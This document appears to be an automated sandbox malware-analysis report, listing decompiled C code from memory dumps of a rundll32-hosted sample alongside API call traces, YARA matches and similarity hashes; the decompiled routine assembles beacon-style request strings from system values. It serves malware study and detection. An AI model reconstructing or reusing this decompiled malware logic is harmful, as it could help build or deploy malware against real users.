                                            • HeapFree.KERNEL32(00000000,00000000), ref: 058084F9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$lstrcatwsprintf$CriticalSectionlstrlen$lstrcpy$AllocateEnterLeaveTrimmemcpy$strcpy
                                            • String ID:
                                            • API String ID: 4032678529-0
                                            • Opcode ID: d375d9cc4a6bcd70e5dfa697c6e5d7afe858c90bbf5c92e4b8a70b5e5f8da80c
                                            • Instruction ID: e721e5b82e9c3877599040462df66b6834d9faf29d85336975559a4975171f03
                                            • Opcode Fuzzy Hash: d375d9cc4a6bcd70e5dfa697c6e5d7afe858c90bbf5c92e4b8a70b5e5f8da80c
                                            • Instruction Fuzzy Hash: BBB18B31214205AFDBA1DFA9DC89E2A7FE9BB48210F049819FD45C72A0CB31E885CF56
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E049F59E2(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, void* _a20) {
                                            				signed int _v8;
                                            				void* _v12;
                                            				void* _v16;
                                            				void* _v20;
                                            				void* _v24;
                                            				void* __ebx;
                                            				void* __edi;
                                            				long _t63;
                                            				intOrPtr _t64;
                                            				intOrPtr _t65;
                                            				intOrPtr _t66;
                                            				intOrPtr _t67;
                                            				intOrPtr _t68;
                                            				void* _t71;
                                            				intOrPtr _t72;
                                            				int _t75;
                                            				void* _t76;
                                            				void* _t77;
                                            				void* _t79;
                                            				void* _t82;
                                            				intOrPtr _t86;
                                            				intOrPtr _t90;
                                            				intOrPtr* _t92;
                                            				void* _t98;
                                            				intOrPtr _t104;
                                            				signed int _t108;
                                            				char** _t110;
                                            				int _t113;
                                            				intOrPtr* _t116;
                                            				intOrPtr* _t118;
                                            				intOrPtr* _t120;
                                            				intOrPtr* _t122;
                                            				intOrPtr _t125;
                                            				intOrPtr _t130;
                                            				int _t134;
                                            				intOrPtr _t136;
                                            				int _t139;
                                            				CHAR* _t140;
                                            				intOrPtr _t141;
                                            				void* _t142;
                                            				void* _t151;
                                            				int _t152;
                                            				void* _t153;
                                            				intOrPtr _t154;
                                            				void* _t156;
                                            				long _t160;
                                            				intOrPtr* _t161;
                                            				intOrPtr* _t162;
                                            				intOrPtr* _t165;
                                            				void* _t166;
                                            				void* _t168;
                                            
                                            				_t151 = __edx;
                                            				_t142 = __ecx;
                                            				_t63 = __eax;
                                            				_v8 = 8;
                                            				if(__eax == 0) {
                                            					_t63 = GetTickCount();
                                            				}
                                            				_t64 =  *0x49fa018; // 0x6a85f48
                                            				asm("bswap eax");
                                            				_t65 =  *0x49fa014; // 0x3a87c8cd
                                            				_t140 = _a20;
                                            				asm("bswap eax");
                                            				_t66 =  *0x49fa010; // 0xd8d2f808
                                            				asm("bswap eax");
                                            				_t67 =  *0x49fa00c; // 0x81762942
                                            				asm("bswap eax");
                                            				_t68 =  *0x49fa348; // 0x57d5a8
                                            				_t3 = _t68 + 0x49fb633; // 0x74666f73
                                            				_t152 = wsprintfA(_t140, _t3, 3, 0x3d173, _t67, _t66, _t65, _t64,  *0x49fa02c,  *0x49fa004, _t63);
                                            				_t71 = E049F3F1E();
                                            				_t72 =  *0x49fa348; // 0x57d5a8
                                            				_t4 = _t72 + 0x49fb673; // 0x74707526
                                            				_t75 = wsprintfA(_t152 + _t140, _t4, _t71);
                                            				_t168 = _t166 + 0x38;
                                            				_t153 = _t152 + _t75;
                                            				if(_a8 != 0) {
                                            					_t136 =  *0x49fa348; // 0x57d5a8
                                            					_t8 = _t136 + 0x49fb67e; // 0x732526
                                            					_t139 = wsprintfA(_t153 + _t140, _t8, _a8);
                                            					_t168 = _t168 + 0xc;
                                            					_t153 = _t153 + _t139;
                                            				}
                                            				_t76 = E049F1567(_t142);
                                            				_t141 = __imp__;
                                            				_a8 = _t76;
                                            				if(_t76 != 0) {
                                            					_t130 =  *0x49fa348; // 0x57d5a8
                                            					_t11 = _t130 + 0x49fb8d4; // 0x736e6426
                                            					_t134 = wsprintfA(_a20 + _t153, _t11, _t76);
                                            					_t168 = _t168 + 0xc;
                                            					_t153 = _t153 + _t134;
                                            					HeapFree( *0x49fa2d8, 0, _a8);
                                            				}
                                            				_t77 = E049F3268();
                                            				_a8 = _t77;
                                            				if(_t77 != 0) {
                                            					_t125 =  *0x49fa348; // 0x57d5a8
                                            					_t15 = _t125 + 0x49fb8dc; // 0x6f687726
                                            					wsprintfA(_t153 + _a20, _t15, _t77);
                                            					_t168 = _t168 + 0xc;
                                            					HeapFree( *0x49fa2d8, 0, _a8);
                                            				}
                                            				_t154 =  *0x49fa3cc; // 0x4f795b0
                                            				_t79 = E049F5D1C(0x49fa00a, _t154 + 4);
                                            				_t160 = 0;
                                            				_v16 = _t79;
                                            				if(_t79 == 0) {
                                            					L28:
                                            					HeapFree( *0x49fa2d8, _t160, _a20);
                                            					return _v8;
                                            				} else {
                                            					_t82 = RtlAllocateHeap( *0x49fa2d8, 0, 0x800);
                                            					_a8 = _t82;
                                            					if(_t82 == 0) {
                                            						L27:
                                            						HeapFree( *0x49fa2d8, _t160, _v16);
                                            						goto L28;
                                            					}
                                            					E049F3950(GetTickCount());
                                            					_t86 =  *0x49fa3cc; // 0x4f795b0
                                            					__imp__(_t86 + 0x40);
                                            					asm("lock xadd [eax], ecx");
                                            					_t90 =  *0x49fa3cc; // 0x4f795b0
                                            					__imp__(_t90 + 0x40);
                                            					_t92 =  *0x49fa3cc; // 0x4f795b0
                                            					_t156 = E049F3739(1, _t151, _a20,  *_t92);
                                            					_v24 = _t156;
                                            					asm("lock xadd [eax], ecx");
                                            					if(_t156 == 0) {
                                            						L26:
                                            						HeapFree( *0x49fa2d8, _t160, _a8);
                                            						goto L27;
                                            					}
                                            					StrTrimA(_t156, 0x49f928c);
                                            					_push(_t156);
                                            					_t98 = E049F3970();
                                            					_v12 = _t98;
                                            					if(_t98 == 0) {
                                            						L25:
                                            						HeapFree( *0x49fa2d8, _t160, _t156);
                                            						goto L26;
                                            					}
                                            					_t161 = __imp__;
                                            					 *_t161(_t156, _a4);
                                            					 *_t161(_a8, _v16);
                                            					_t162 = __imp__;
                                            					 *_t162(_a8, _v12);
                                            					_t104 = E049F4208( *_t162(_a8, _t156), _a8);
                                            					_a4 = _t104;
                                            					if(_t104 == 0) {
                                            						_v8 = 8;
                                            						L23:
                                            						E049F3F62();
                                            						L24:
                                            						HeapFree( *0x49fa2d8, 0, _v12);
                                            						_t160 = 0;
                                            						goto L25;
                                            					}
                                            					_t108 = E049F388D(_t141, 0xffffffffffffffff, _t156,  &_v20);
                                            					_v8 = _t108;
                                            					if(_t108 == 0) {
                                            						_t165 = _v20;
                                            						_v8 = E049F3394(_t165, _a4, _a12, _a16);
                                            						_t116 =  *((intOrPtr*)(_t165 + 8));
                                            						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                                            						_t118 =  *((intOrPtr*)(_t165 + 8));
                                            						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                            						_t120 =  *((intOrPtr*)(_t165 + 4));
                                            						 *((intOrPtr*)( *_t120 + 8))(_t120);
                                            						_t122 =  *_t165;
                                            						 *((intOrPtr*)( *_t122 + 8))(_t122);
                                            						E049F4C73(_t165);
                                            					}
                                            					if(_v8 != 0x10d2) {
                                            						L18:
                                            						if(_v8 == 0) {
                                            							_t110 = _a12;
                                            							if(_t110 != 0) {
                                            								_t157 =  *_t110;
                                            								_t163 =  *_a16;
                                            								wcstombs( *_t110,  *_t110,  *_a16);
                                            								_t113 = E049F43A5(_t157, _t157, _t163 >> 1);
                                            								_t156 = _v24;
                                            								 *_a16 = _t113;
                                            							}
                                            						}
                                            						goto L21;
                                            					} else {
                                            						if(_a12 != 0) {
                                            							L21:
                                            							E049F4C73(_a4);
                                            							if(_v8 == 0 || _v8 == 0x10d2) {
                                            								goto L24;
                                            							} else {
                                            								goto L23;
                                            							}
                                            						}
                                            						_v8 = _v8 & 0x00000000;
                                            						goto L18;
                                            					}
                                            				}
                                            			}
                                            0x049f59e2
                                            0x049f59e2
                                            0x049f59e2
                                            0x049f59eb
                                            0x049f59f4
                                            0x049f59f6
                                            0x049f59f6
                                            0x049f5a03
                                            0x049f5a0e
                                            0x049f5a11
                                            0x049f5a16
                                            0x049f5a1f
                                            0x049f5a22
                                            0x049f5a27
                                            0x049f5a2a
                                            0x049f5a2f
                                            0x049f5a32
                                            0x049f5a3e
                                            0x049f5a4b
                                            0x049f5a4d
                                            0x049f5a53
                                            0x049f5a58
                                            0x049f5a63
                                            0x049f5a65
                                            0x049f5a68
                                            0x049f5a6e
                                            0x049f5a70
                                            0x049f5a78
                                            0x049f5a83
                                            0x049f5a85
                                            0x049f5a88
                                            0x049f5a88
                                            0x049f5a8a
                                            0x049f5a8f
                                            0x049f5a95
                                            0x049f5a9a
                                            0x049f5a9d
                                            0x049f5aa2
                                            0x049f5aaf
                                            0x049f5ab1
                                            0x049f5ab7
                                            0x049f5ac1
                                            0x049f5ac1
                                            0x049f5ac3
                                            0x049f5ac8
                                            0x049f5acd
                                            0x049f5ad0
                                            0x049f5ad5
                                            0x049f5ae2
                                            0x049f5ae4
                                            0x049f5af2
                                            0x049f5af2
                                            0x049f5af4
                                            0x049f5b02
                                            0x049f5b07
                                            0x049f5b09
                                            0x049f5b0e
                                            0x049f5ccf
                                            0x049f5cd9
                                            0x049f5ce2
                                            0x049f5b14
                                            0x049f5b20
                                            0x049f5b26
                                            0x049f5b2b
                                            0x049f5cc3
                                            0x049f5ccd
                                            0x00000000
                                            0x049f5ccd
                                            0x049f5b37
                                            0x049f5b3c
                                            0x049f5b45
                                            0x049f5b56
                                            0x049f5b5a
                                            0x049f5b63
                                            0x049f5b69
                                            0x049f5b78
                                            0x049f5b7f
                                            0x049f5b88
                                            0x049f5b8e
                                            0x049f5cb7
                                            0x049f5cc1
                                            0x00000000
                                            0x049f5cc1
                                            0x049f5b9a
                                            0x049f5ba0
                                            0x049f5ba1
                                            0x049f5ba6
                                            0x049f5bab
                                            0x049f5cad
                                            0x049f5cb5
                                            0x00000000
                                            0x049f5cb5
                                            0x049f5bb4
                                            0x049f5bbb
                                            0x049f5bc3
                                            0x049f5bc8
                                            0x049f5bd1
                                            0x049f5bdc
                                            0x049f5be1
                                            0x049f5be6
                                            0x049f5ce5
                                            0x049f5c99
                                            0x049f5c99
                                            0x049f5c9e
                                            0x049f5ca9
                                            0x049f5cab
                                            0x00000000
                                            0x049f5cab
                                            0x049f5bf0
                                            0x049f5bf5
                                            0x049f5bfa
                                            0x049f5bff
                                            0x049f5c0f
                                            0x049f5c12
                                            0x049f5c18
                                            0x049f5c1e
                                            0x049f5c24
                                            0x049f5c27
                                            0x049f5c2d
                                            0x049f5c30
                                            0x049f5c35
                                            0x049f5c39
                                            0x049f5c39
                                            0x049f5c45
                                            0x049f5c51
                                            0x049f5c55
                                            0x049f5c57
                                            0x049f5c5c
                                            0x049f5c5e
                                            0x049f5c63
                                            0x049f5c68
                                            0x049f5c75
                                            0x049f5c7d
                                            0x049f5c80
                                            0x049f5c80
                                            0x049f5c5c
                                            0x00000000
                                            0x049f5c47
                                            0x049f5c4b
                                            0x049f5c82
                                            0x049f5c85
                                            0x049f5c8e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f5c8e
                                            0x049f5c4d
                                            0x00000000
                                            0x049f5c4d
                                            0x049f5c45

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 049F59F6
                                            • wsprintfA.USER32 ref: 049F5A46
                                            • wsprintfA.USER32 ref: 049F5A63
                                            • wsprintfA.USER32 ref: 049F5A83
                                            • wsprintfA.USER32 ref: 049F5AAF
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F5AC1
                                            • wsprintfA.USER32 ref: 049F5AE2
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F5AF2
                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 049F5B20
                                            • GetTickCount.KERNEL32 ref: 049F5B31
                                            • RtlEnterCriticalSection.NTDLL(04F79570), ref: 049F5B45
                                            • RtlLeaveCriticalSection.NTDLL(04F79570), ref: 049F5B63
                                              • Part of subcall function 049F3739: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,75BCC740,?,?,049F653D,?,04F795B0), ref: 049F3764
                                              • Part of subcall function 049F3739: lstrlen.KERNEL32(?,?,?,049F653D,?,04F795B0), ref: 049F376C
                                              • Part of subcall function 049F3739: strcpy.NTDLL ref: 049F3783
                                              • Part of subcall function 049F3739: lstrcat.KERNEL32(00000000,?), ref: 049F378E
                                              • Part of subcall function 049F3739: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,049F653D,?,04F795B0), ref: 049F37AB
                                            • StrTrimA.SHLWAPI(00000000,049F928C,?,04F795B0), ref: 049F5B9A
                                              • Part of subcall function 049F3970: lstrlen.KERNEL32(04F79B90,00000000,00000000,75BCC740,049F6568,00000000), ref: 049F3980
                                              • Part of subcall function 049F3970: lstrlen.KERNEL32(?), ref: 049F3988
                                              • Part of subcall function 049F3970: lstrcpy.KERNEL32(00000000,04F79B90), ref: 049F399C
                                              • Part of subcall function 049F3970: lstrcat.KERNEL32(00000000,?), ref: 049F39A7
                                            • lstrcpy.KERNEL32(00000000,?), ref: 049F5BBB
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 049F5BC3
                                            • lstrcat.KERNEL32(00000000,?), ref: 049F5BD1
                                            • lstrcat.KERNEL32(00000000,00000000), ref: 049F5BD7
                                              • Part of subcall function 049F4208: lstrlen.KERNEL32(?,00000000,04F79DA0,00000000,049F2263,04F79FC3,69B25F44,?,?,?,?,69B25F44,00000005,049FA00C,4D283A53,?), ref: 049F420F
                                              • Part of subcall function 049F4208: mbstowcs.NTDLL ref: 049F4238
                                              • Part of subcall function 049F4208: memset.NTDLL ref: 049F424A
                                            • wcstombs.NTDLL ref: 049F5C68
                                              • Part of subcall function 049F3394: SysAllocString.OLEAUT32(?), ref: 049F33CF
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            • HeapFree.KERNEL32(00000000,?,00000000), ref: 049F5CA9
                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 049F5CB5
                                            • HeapFree.KERNEL32(00000000,00000000,?,04F795B0), ref: 049F5CC1
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F5CCD
                                            • HeapFree.KERNEL32(00000000,?), ref: 049F5CD9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Heap$Free$lstrlenwsprintf$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                            • String ID:
                                            • API String ID: 2543559236-0
                                            • Opcode ID: 909a292c1a8ad951ee9ed1f4452a3985626919716759adb700b2e5e98fd4dc91
                                            • Instruction ID: 5e70fad6015f7bf7e3670d37e1a821f0a755e9ed9fd5831f3a7737d62589cd25
                                            • Opcode Fuzzy Hash: 909a292c1a8ad951ee9ed1f4452a3985626919716759adb700b2e5e98fd4dc91
                                            • Instruction Fuzzy Hash: EF912571A00209AFDB11DFA8DC48E9A3FA9EF49324F158034F909D7261DB39ED51DBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetLastError.KERNEL32 ref: 058126D1
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 058126ED
                                            • GetLastError.KERNEL32 ref: 0581273C
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05812752
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 05812766
                                            • GetLastError.KERNEL32 ref: 05812780
                                            • GetLastError.KERNEL32 ref: 058127B3
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 058127D1
                                            • lstrlenW.KERNEL32(00000000,?), ref: 058127FD
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 05812812
                                            • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 058128E6
                                            • HeapFree.KERNEL32(00000000,?), ref: 058128F5
                                            • WaitForSingleObject.KERNEL32(00000000), ref: 0581290A
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0581291D
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581292F
                                            • RtlExitUserThread.NTDLL(?,?), ref: 05812944
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                                            • String ID:
                                            • API String ID: 3853681310-3916222277
                                            • Opcode ID: 383155dd87cb9d3f8db1a530df7b58ad7689d8d9aa697bce21ce114f514568f9
                                            • Instruction ID: 2a9d58ae979da2ac9ca04173bed6cd8896b6a9d8bd28e3167df4a7c191d1cfb2
                                            • Opcode Fuzzy Hash: 383155dd87cb9d3f8db1a530df7b58ad7689d8d9aa697bce21ce114f514568f9
                                            • Instruction Fuzzy Hash: 25812575910209AFDF209FA6DC89EBE7FBDFB09210F008469FD06E3250DA706D858B65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,765BD3B0,76C85520,?,?,?,058021C2,?), ref: 0580EEDC
                                              • Part of subcall function 0580EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 0580EEF0
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,058021C2,?,?,?), ref: 0580EF0A
                                              • Part of subcall function 0580EEA4: RegCloseKey.KERNEL32(?,?,?,?,058021C2,?,?,?), ref: 0580EF34
                                            • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 0581749E
                                            • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 058174BC
                                            • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 058174E8
                                            • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,?,00000000,?,?,?), ref: 05817556
                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 058175CE
                                            • wsprintfA.USER32 ref: 058175EA
                                            • lstrlen.KERNEL32(00000000,00000000), ref: 058175F5
                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0581760C
                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05817698
                                            • wsprintfA.USER32 ref: 058176B3
                                            • lstrlen.KERNEL32(00000000,00000000), ref: 058176BE
                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 058176D5
                                            • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,?,00000000,?,?,?), ref: 058176F7
                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05817712
                                            • wsprintfA.USER32 ref: 05817729
                                            • lstrlen.KERNEL32(00000000,00000000), ref: 05817734
                                              • Part of subcall function 05803622: lstrlen.KERNEL32(0580D8E9,00000000,?,?,?,?,0580D8E9,00000035,00000000,?,00000000), ref: 05803652
                                              • Part of subcall function 05803622: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 05803668
                                              • Part of subcall function 05803622: memcpy.NTDLL(00000010,0580D8E9,00000000,?,?,0580D8E9,00000035,00000000), ref: 0580369E
                                              • Part of subcall function 05803622: memcpy.NTDLL(00000010,00000000,00000035,?,?,0580D8E9,00000035), ref: 058036B9
                                              • Part of subcall function 05803622: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 058036D7
                                              • Part of subcall function 05803622: GetLastError.KERNEL32(?,?,0580D8E9,00000035), ref: 058036E1
                                              • Part of subcall function 05803622: HeapFree.KERNEL32(00000000,00000000,?,?,0580D8E9,00000035), ref: 05803704
                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0581774B
                                            • HeapFree.KERNEL32(00000000,?), ref: 05817777
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                                            • String ID:
                                            • API String ID: 3130754786-0
                                            • Opcode ID: 5b41d2d6faf85d5fe549f5ce85e5ba1851943f518a08dab47c923b58de1baed7
                                            • Instruction ID: f49f7e7c87ed4755ccab85b1e2bb9301a78f46d7af39e7c6282737c99fe490cf
                                            • Opcode Fuzzy Hash: 5b41d2d6faf85d5fe549f5ce85e5ba1851943f518a08dab47c923b58de1baed7
                                            • Instruction Fuzzy Hash: F4A119B1900209AFEF209F98DC89DAE7F7DFB08354F108469FD06E3250DA356D849B69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlenW.KERNEL32(?), ref: 0580DAED
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?,00000000,76C869A0,?,00000250,?,00000000), ref: 05805A60
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?,?,00000000), ref: 05805A6C
                                              • Part of subcall function 05805A14: memset.NTDLL ref: 05805AB4
                                              • Part of subcall function 05805A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05805ACF
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(0000002C), ref: 05805B07
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?), ref: 05805B0F
                                              • Part of subcall function 05805A14: memset.NTDLL ref: 05805B32
                                              • Part of subcall function 05805A14: wcscpy.NTDLL ref: 05805B44
                                              • Part of subcall function 05805A14: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 05805B6A
                                              • Part of subcall function 05805A14: RtlEnterCriticalSection.NTDLL(?), ref: 05805BA0
                                              • Part of subcall function 05805A14: RtlLeaveCriticalSection.NTDLL(?), ref: 05805BBC
                                              • Part of subcall function 05805A14: FindNextFileW.KERNEL32(?,00000000), ref: 05805BD5
                                              • Part of subcall function 05805A14: WaitForSingleObject.KERNEL32(00000000), ref: 05805BE7
                                              • Part of subcall function 05805A14: FindClose.KERNEL32(?), ref: 05805BFC
                                              • Part of subcall function 05805A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05805C10
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(0000002C), ref: 05805C32
                                            • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 0580DB49
                                            • memcpy.NTDLL(00000000,?,00000000), ref: 0580DB5C
                                            • lstrcpyW.KERNEL32(00000000,?), ref: 0580DB73
                                              • Part of subcall function 05805A14: FindNextFileW.KERNEL32(?,00000000), ref: 05805CA8
                                              • Part of subcall function 05805A14: WaitForSingleObject.KERNEL32(00000000), ref: 05805CBA
                                              • Part of subcall function 05805A14: FindClose.KERNEL32(?), ref: 05805CD5
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 0580DB9E
                                            • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 0580DBB6
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0580DC10
                                            • lstrlenW.KERNEL32(00000000,?), ref: 0580DC33
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580DC45
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 0580DCB9
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580DCC9
                                              • Part of subcall function 0580ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,0581A2DC,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 0580AE07
                                              • Part of subcall function 0580ADF8: mbstowcs.NTDLL ref: 0580AE23
                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 0580DCF2
                                            • lstrlenW.KERNEL32(0582A878,?), ref: 0580DD6C
                                            • DeleteFileW.KERNEL32(?,?), ref: 0580DD9A
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580DDA8
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580DDC9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                                            • String ID:
                                            • API String ID: 72361108-0
                                            • Opcode ID: 76eec16b691676cd3efc6d4997fbb437361f58dee8df3ffe6d80fd9dad4f416e
                                            • Instruction ID: 9701f6bc1149509943d5657fd9bd7f419f1c5227e5d872894df1fb8d33bcb153
                                            • Opcode Fuzzy Hash: 76eec16b691676cd3efc6d4997fbb437361f58dee8df3ffe6d80fd9dad4f416e
                                            • Instruction Fuzzy Hash: A59189B1611219AFDB60EFA5DC89DEA7FBDFF08350B048011FE0AD7250DA74A985CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • memset.NTDLL ref: 0580B554
                                            • StrChrA.SHLWAPI(?,0000000D), ref: 0580B59A
                                            • StrChrA.SHLWAPI(?,0000000A), ref: 0580B5A7
                                            • StrChrA.SHLWAPI(?,0000007C), ref: 0580B5CE
                                            • StrTrimA.SHLWAPI(?,05824FC4), ref: 0580B5E3
                                            • StrChrA.SHLWAPI(?,0000003D), ref: 0580B5EC
                                            • StrTrimA.SHLWAPI(00000001,05824FC4), ref: 0580B602
                                            • _strupr.NTDLL ref: 0580B609
                                            • StrTrimA.SHLWAPI(?,?), ref: 0580B616
                                            • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 0580B65E
                                            • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 0580B67D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                                            • String ID: $;
                                            • API String ID: 4019332941-73438061
                                            • Opcode ID: d5bbb5eabe33047e3c24f1c7af2171ec58e7627ebafd8dd5e33782558790d6a4
                                            • Instruction ID: 7919e4e1f2d355328f5cfc46e375fdd9a331d6620d665c91aeba5e67eed56512
                                            • Opcode Fuzzy Hash: d5bbb5eabe33047e3c24f1c7af2171ec58e7627ebafd8dd5e33782558790d6a4
                                            • Instruction Fuzzy Hash: 2741D071208306AFDB60EF288C45B2BBFE8BF44601F045819FD96DB291DB74ED058B62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • memset.NTDLL ref: 0580B97D
                                              • Part of subcall function 0580ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,0581A2DC,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 0580AE07
                                              • Part of subcall function 0580ADF8: mbstowcs.NTDLL ref: 0580AE23
                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0580B9B6
                                            • wcstombs.NTDLL ref: 0580B9C0
                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0580B9F1
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0580B8C3), ref: 0580BA1D
                                            • TerminateProcess.KERNEL32(?,000003E5), ref: 0580BA33
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0580B8C3), ref: 0580BA47
                                            • GetLastError.KERNEL32 ref: 0580BA4B
                                            • GetExitCodeProcess.KERNEL32(?,00000001), ref: 0580BA6B
                                            • CloseHandle.KERNEL32(?), ref: 0580BA7A
                                            • CloseHandle.KERNEL32(?), ref: 0580BA7F
                                            • GetLastError.KERNEL32 ref: 0580BA83
                                            Strings
                                            Memory Dump Source
